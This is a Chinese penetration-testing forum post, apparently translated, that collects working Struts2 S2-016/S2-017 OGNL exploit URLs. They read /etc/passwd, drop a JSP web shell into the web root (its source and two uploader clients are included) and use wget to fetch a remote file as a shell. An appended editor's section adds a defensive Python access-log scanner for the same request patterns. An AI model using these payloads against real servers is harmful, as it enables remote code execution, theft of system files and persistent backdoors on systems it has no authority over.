中国网络渗透测试联盟

Title: Struts2 S2-016/S2-017 vulnerability code execution

Author: admin    Time: 2013-7-18 23:03
Everyone has already posted these, so I just tidied them up. Friendly reminder: your own skin is worth more than a shell.

If you like it, click thanks ^_^

Command execution with echoed output:

http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

Reveal the server path:

http://www.example.com/struts2-b ... 8%29.close%28%29%7D

Write a file:

http://www.example.com/struts2-blank/example/X.action?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e

Contents of the written file:

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

It is really just a small JSP shell (xiaoma); it needs a client to go with it.

f is the file name, t is the content.

Client:

<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
<textarea name="t" cols="120" rows="10">your code</textarea>
<center>
<input type="submit" value="Submit">
</center>
</form>

That creates a fjp.jsp in the current directory.

shell: http://www.example.com/struts2-blank/example/fjp.jsp

There is also a client from @园长:

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>jsp-园长</title>
<style>
.main{width:980px;height:600px;margin:0 auto;}
.url{width:300px;}
.fn{width:60px;}
.content{width:80%;height:60%;}
</style>
<script>
  // Check the three fields, point the form at the css3.jsp dropper URL and POST f (file name) and t (content).
  function upload(){
    var url = document.getElementById('url').value,
      content = document.getElementById('content').value,
      fileName = document.getElementById('fn').value,
      form = document.getElementById('fm');
    if(url.length == 0){
      alert("URL must not be empty!");
      return;
    }
    if(content.length == 0){
      alert("Content must not be empty!");
      return;
    }
    if(fileName.length == 0){
      alert("FileName must not be empty!");
      return;
    }
    form.action = url;
    form.submit();
  }
</script>
</head>
<body>
<div class="main">
  <form id="fm" method="post">
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
    <a href="javascript:upload();">Upload</a>
    <textarea id="content" class="content" name="t"></textarea>
  </form>
</div>
</body>
</html>

There is also a wget getshell posted by @X:

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','-O','/root/1.jsp'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23piaoye%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println(%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
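Added by the editor, not part of admin's post or of any code quoted in it: a detection pass over web-server access logs for the two request shapes the post relies on, the redirect:/redirectAction: parameter prefix on its own (the S2-017 open redirect) and that prefix carrying an OGNL ${...} expression (the S2-016 code execution every payload above uses). The log lines are constructed samples; the request targets in lines 2 and 4 follow the post's echoed-command and file-write payloads, percent-encoded as a client would send them. The marker list, the verdict names and the Common Log Format parser are this example's own choices.

```python
"""Flag S2-016 / S2-017 abuse in access logs.

Added example, not code from the original post. All log lines are
constructed; the request targets copy the shape of the post's payloads.
"""
import re
from urllib.parse import unquote

# Both advisories concern the "redirect:" and "redirectAction:" parameter
# prefixes. S2-017 is the open redirect (prefix followed by any URL);
# S2-016 is the same prefix followed by an OGNL expression "${...}" that the
# framework evaluates, which is what every payload in the post does.
PREFIX_RE = re.compile(r'[?&](redirect|redirectAction):', re.IGNORECASE)
OGNL_RE = re.compile(r'[?&](?:redirect|redirectAction):\s*\$\{', re.IGNORECASE)

# Strings that appear in the post's payloads once the URL is decoded.
# (Marker list chosen for this example; extend it for your own environment.)
RCE_MARKERS = (
    'java.lang.ProcessBuilder',
    'java.lang.Runtime',
    '#context.get(',
    'com.opensymphony.xwork2.dispatcher.',
    'java.io.FileWriter',
    'java.io.FileOutputStream',
)

# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def normalise_target(target):
    """One percent-decoding pass (what the servlet container does) and
    '+' -> space, which the post's payloads rely on ('new+java.io...')."""
    return unquote(target).replace('+', ' ')


def classify(target):
    """Return (verdict, markers) for a request target, or None if clean.
    verdict is 'redirect-prefix' (S2-017 shape), 'ognl' (S2-016 shape with
    no known RCE marker) or 'ognl-rce' (S2-016 shape with RCE markers)."""
    decoded = normalise_target(target)
    if not PREFIX_RE.search(decoded):
        return None
    if not OGNL_RE.search(decoded):
        return ('redirect-prefix', [])
    markers = [m for m in RCE_MARKERS if m in decoded]
    return ('ognl-rce' if markers else 'ognl', markers)


def scan_log(lines):
    """Return [(ip, timestamp, status, verdict, markers)] for suspicious lines."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue            # not CLF; skip rather than guess at fields
        ip, ts, _method, target, status = m.groups()
        result = classify(target)
        if result is not None:
            verdict, markers = result
            hits.append((ip, ts, int(status), verdict, markers))
    return hits


# Constructed sample log (no real server). Line 2 mirrors the post's
# echoed-command payload, line 4 its file-write payload, both percent-encoded
# as a client sends them; line 3 is a plain S2-017 redirect, line 5 OGNL with
# no RCE marker.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jul/2013:23:03:01 +0800] "GET /struts2-blank/example/HelloWorld.action HTTP/1.1" 200 1234',
    '203.0.113.7 - - [18/Jul/2013:23:03:12 +0800] "GET /struts2-blank/example/X.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27})).start(),%23b%3d%23a.getInputStream(),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23b)} HTTP/1.1" 302 0',
    '198.51.100.9 - - [18/Jul/2013:23:04:40 +0800] "GET /struts2-blank/example/X.action?redirectAction:http://attacker.example/ HTTP/1.1" 302 0',
    '203.0.113.7 - - [18/Jul/2013:23:05:03 +0800] "GET /struts2-blank/example/X.action?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23p%3d%23req.getRealPath(%22/%22)%2b%22css3.jsp%22,new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()}&c=%3c%25%25%3e HTTP/1.1" 302 0',
    '192.0.2.4 - - [18/Jul/2013:23:06:10 +0800] "GET /struts2-blank/example/X.action?redirect:${1%2b1} HTTP/1.1" 302 0',
]

if __name__ == '__main__':
    for ip, ts, status, verdict, markers in scan_log(SAMPLE_LOG):
        print(f'{ip} {ts} {status} {verdict} {markers}')
```

scan_log returns one tuple per suspicious request. A 302 in the status column does not mean the attempt failed: the redirect: prefix produces a redirect response whether or not the OGNL ran, so anything tagged ognl-rce should be treated as a possible compromise, and since the post's file-write payload drops a JSP into the path returned by getRealPath("/"), the web root should be checked for new .jsp files alongside the log.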




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2